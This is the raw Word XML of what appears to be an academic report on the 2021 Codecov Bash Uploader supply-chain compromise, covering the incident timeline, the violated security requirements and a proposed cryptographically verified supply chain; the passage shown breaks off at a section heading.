          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73867398"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Abstract</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080D7639"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Problem Statement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077D20AF"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System Requirements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665B80FC"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Design and Implementation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F703237"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Security Analysis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E434CAE"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System Testing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E1B436" w14:textId="38051313"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val="en-US" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Innovation and Application Relevance</w:t>
      </w:r>
      <w:r w:rsidR="00F416E0" w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCB3EFA" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="005E06C9" w:rsidP="00F416E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="9014" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3BE1F8" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="00221CB0" w:rsidP="00F416E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="9014" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidSect="00F416E0">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F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
      <w:r w:rsidR="005E06C9" w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>30</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:after="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CHAPTER 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>INTRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.1 Background</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Modern software is assembled from many parts: source code, open-source libraries, build tools, CI/CD services and third-party scripts that run inside build pipelines. Every link in this </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>software supply chain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> runs with some privilege. A CI job usually holds deployment keys, cloud credentials and API tokens as environment variables. If any tool that runs in that job is replaced with a malicious version, the attacker inherits all of those secrets without ever touching the victim directly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This report studies a documented incident of exactly this type, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2021 Codecov Bash Uploader compromise</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> [1]. It analyses the threats and vulnerabilities involved, then designs, implements and tests a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Cryptographically Verified Software Supply Chain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: a working prototype in which customers automatically refuse to run any vendor artifact whose integrity and authenticity cannot be proven cryptographically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.2 Organisation and Sector</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Codecov is a software-as-a-service provider in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>software development tooling (DevOps) sector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. It measures code coverage, meaning which lines of a program are exercised by its automated tests. Customers integrate Codecov into their CI pipelines. After the tests run, a small uploader program sends the coverage report to Codecov. The most widely used integration was the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bash Uploader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, a shell script that pipelines typically downloaded from Codecov's servers and executed on every build. Other integrations (the Codecov GitHub Action, CircleCI Orb and Bitrise Step) used the same script [1]. Public reporting at the time put the customer base at more than 29,000 organisations [2].</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.3 Incident Context and Date</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 1.1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Incident summary</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cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2381"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Attribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Details (documented)</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Organisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Codecov (code-coverage SaaS, DevOps tooling)</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Incident type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Software supply-chain compromise: unauthorised modification of a distributed script</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Compromised component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Bash Uploader script, plus integrations that used it (GitHub Action, CircleCI Orb, Bitrise Step)</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Period of compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Periodic unauthorised alterations beginning </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>31 January 2021</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">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Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1 April 2021</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>, after a customer reported that the checksum of the downloaded script did not match the published one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Public disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>15 April 2021</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">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Initial access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>An error in Codecov's Docker image creation process allowed the actor to extract a credential (an HMAC key for a Google Cloud Storage service account) able to modify the uploader [1]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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Credentials, tokens and keys present in affected customers' CI environments, and git remote URLs, could be sent to a third-party server [1]. Downstream organisations had to rotate secrets. HashiCorp, for example, disclosed that a GPG private key used to sign its release checksums was exposed and rotated it [3].</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.4 Security Requirements Violated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The incident violated several security goals at once. The primary failure was </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>integrity combined with authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: customers had no automatic, cryptographic way to confirm that the script they ran was the one Codecov intended to publish.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 1.2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Security requirements violated</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cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2381"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>How it was violated</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Integrity (primary)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>The distributed uploader was modified; one added line changed its behaviour, and customers executed it unmodified.</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Authentication / authenticity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Nothing proved that the script came from Codecov's release process rather than from someone holding a storage credential.</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Confidentiality</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Environment variables (CI secrets, tokens, keys) and git remote URLs from customer pipelines were sent to a third-party server.</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Non-repudiation / accountability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>There was no signed, tamper-evident record binding each published version to an authorised release, so tracing which content was served when was difficult.</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Availability (secondary)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Thousands of organisations had to rotate credentials and audit their pipelines, disrupting normal operations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
